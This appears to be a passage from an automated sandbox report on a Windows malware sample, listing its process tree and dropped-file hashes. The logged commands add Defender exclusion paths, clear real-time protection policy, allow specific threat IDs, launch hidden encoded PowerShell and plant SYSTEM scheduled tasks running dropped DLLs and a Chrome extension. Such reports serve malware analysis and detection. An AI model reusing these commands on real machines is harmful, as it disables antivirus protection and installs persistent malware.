C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2504 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1700 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1792 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:932 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2000 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2424 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2824 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1632 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:944 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2096 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:596 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵PID:692
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵PID:1736
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵PID:2284
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵PID:2064
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵PID:2736
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵PID:2092
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵PID:2316
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵PID:2176
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵PID:1544
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵PID:1540
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵PID:3020
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵PID:2344
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2276
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2816
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵PID:1948
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵PID:2636
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:2588
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:2492
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUdAWxbRY" /SC once /ST 00:32:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2628 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUdAWxbRY"3⤵PID:1232
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUdAWxbRY"3⤵PID:2372
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2776
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:3012
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2772
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2224
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:59:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fFRTFEY.exe\" 0c /KJqfdidhX 385121 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2792 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZTNkTKukmvvbOMPkn"3⤵PID:2336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 2923⤵
- Loads dropped DLL
- Program crash
PID:740 -
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fFRTFEY.exeC:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fFRTFEY.exe 0c /KJqfdidhX 385121 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2232 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2560
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:572
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2444
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2780
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1740
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:276
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:568
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2152
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:932
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:608
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2648
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1792
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2532
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1116
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2000
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2448
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"3⤵PID:580
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:316
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2984
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:808
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2876 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:1976
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:1856
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\dVeUJI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:900 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\ooqeYQm.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2760 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ucrVpivlTlXwlAC"3⤵PID:276
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ucrVpivlTlXwlAC"3⤵PID:932
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\nHvRqKk.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2348 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\dGeQaer.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2424 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\gnvvBcW.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2832 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\fuQywmc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2020 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:19:05 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\PUGqzWxM\feisVPe.dll\",#1 /NeFdidXk 385121" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1992 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BjyVbWVaXyfCTlHuI"3⤵PID:3028
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"3⤵PID:280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 15203⤵
- Loads dropped DLL
- Program crash
PID:2416 -
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\PUGqzWxM\feisVPe.dll",#1 /NeFdidXk 3851212⤵PID:2868
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\PUGqzWxM\feisVPe.dll",#1 /NeFdidXk 3851213⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1796 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"4⤵PID:2600
-
C:\Windows\system32\taskeng.exetaskeng.exe {C3CB38B9-4269-4CBE-AA90-87199076238C} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]1⤵PID:912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:996 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3032
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:928
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2396
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58c84c56d2399c42b71362f9a713ce78f
SHA16c605e587a20c709c8a66ddc4c7fe215fb9e7b69
SHA256213799a0503245bcfcd53030568f7a712f6a79e537951caa45ec119245704bc3
SHA512ad4e9f429612938c2ecfbcb7dd6b7895e1ca80c2cabe22cb079bdaed3d52cf7427738eae418d48d27ba6196067dcf6870088c375f41af909c97298815bce9319
-
Filesize
2KB
MD55cfa1c1314b47ab1ef9aa2204858a9b9
SHA1008291534efac8921ead836713c31bbbd3df705d
SHA256f876a4d5fe957a68259afab47768d3b726367fbf4565b46c7282c8d7a45f99bb
SHA5120d67dbf44c007c6978a9aca4d0819294e26a7af6af9f7dcb48046eb83b17cfe69e92dc9cb06df147eb1f0c1284ce6480776894e104fdeae876015ebf1a71c262
-
Filesize
2KB
MD58281f1d45ef62bb30d5d6dbbd622a522
SHA1ae957b7954eeace43a1c4a7f4aeb756914ee2644
SHA256df4b9f20b41e6cfa595c36a9384534c1aecd96d89fb02221e90ffe1c97a23a62
SHA512139d2e4c3ec82fb64c1ef62893c7169759e3a4d27ccd0136678d26c1b690094220aa4b9833ca66904193ce0dfea39c733328b134571d5edb9799262bb5820268
-
Filesize
2KB
MD55785c842cc54400ee135f58fce0fd9a0
SHA1e7a18ef03b3921670586daaa26ac620324ef755b
SHA25664fa742ec11874cc883d8e6b47b3fe54d30f9136a90880f88a8730f085d205c6
SHA512092a5dc1001a206e0838e06f46555df601ea6b9b794fd923ac4aa389ce33f3bb8a8a66b39b2fd8fa3f0e842916852b3cbda079b3574b06b704ce29b2ee3175c1
-
Filesize
2.0MB
MD528c853781d03fb4bbe67f6d0e5d73d7d
SHA1b3c777adf87e5daf2ee2c8ffdc6e77a646540fa0
SHA256e0a88c5457f0e4b8e2e9ec08bd7378c834762b7b327ef02e64102bbcbb18946b
SHA5128a895fa3b6d57099cb2ad2539f667b0a395c6f609f07e1701a723ee12d2d3e28acf443a0c2894d081bac3ca92627f65b03342f7d263d98f63a3292a7d6a7df27
-
Filesize
2KB
MD51a3c90d8f3cfd7c4f2bb2d63d918a941
SHA1177cf3a8a81e8dc97d28bc21df9b6d7b2f93cac7
SHA256d0120f0105ea6f121b6f4c51fd5b6e71b77f898728d41211279a7430e7938b82
SHA512ec6904489b23572b8684e9f5c3df01c72005e347ed112cc099824de1a9971db1028bc773f30c4b1601b4156b12dcf1e415941cb0d5e38bc8e39074bf1c5b61ea
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5738a3258e2eb83bc3f35f443fe0c8ddf
SHA16a7a56376f83f720d75cf0c0c4b601d1b1636984
SHA2561d4874c2bbcf69e1819982491047acd3862ea2b78649e6fb9cc000ceb30aae7f
SHA512cd3c7d84972ece71f81b74978e497758a4a70ccead1a9b360604c693ef613296a5afc7f2289175ae7d21e1e03221fc35faf6b754bbd6b51e9e795cea9de4fd61
-
Filesize
6.7MB
MD5a5dca05edc6eda6e2acfe7ca41641cc5
SHA1b772813e63a424ae31a2bd75c0067be03aae0165
SHA256986e2f087fe32332daf7215461a103fa25d86209ab704e29a81dc419435367ae
SHA512c3d865918176c064e638d2c892cb2ef45bc722fa9f3b4e1fb10ca6886054ff2d37cd9fd97fff08cdd95a017374109495bf48069fdc67355b34729fae654da2ed
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
